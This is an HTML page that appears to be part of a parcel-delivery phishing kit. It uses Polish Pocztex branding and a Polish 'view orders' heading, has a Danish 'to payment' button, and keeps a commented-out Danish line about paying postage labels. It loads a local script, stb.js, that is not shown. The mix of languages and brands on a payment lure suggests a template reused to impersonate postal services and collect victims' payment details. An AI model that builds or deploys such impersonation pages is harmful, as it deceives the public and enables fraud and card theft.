<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/minak.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body >
    <div>
        <div class="roof">
            <img src="./img/hodor01.png" alt="">
            <img src="./img/BANNER-HERO_INDYWIDUALNY_POCZTEX-V2.jpg" alt="">
        </div>
    </div>


    <div>
        <div>
            <!-- <p class="pp1"> Gennemse og betal dine portokoder eller labels</p> -->
            <p class="pp1">
                Wyświetl Zamówienia
            </p>
            <div class="section">
                
                <div class="kolch">
                    <form  action="">
                        <div class="pack1">
                            
                            <img src="./img/parcil.svg" alt="">
                        </div>

                        <div class="botn">
                            <img src="./img/manopal.svg" alt="">
                            <div class="line"></div>
                            <button class="btn1"  id="barinxri" type="button">Til betaling <img src="./img/icon-16-arrow-.png" alt=""></button>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>


    <div>
        <div>
            <div class="boot">
                <img src="./img/boott.JPG" alt="">
            </div>
        </div>
    </div>


    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>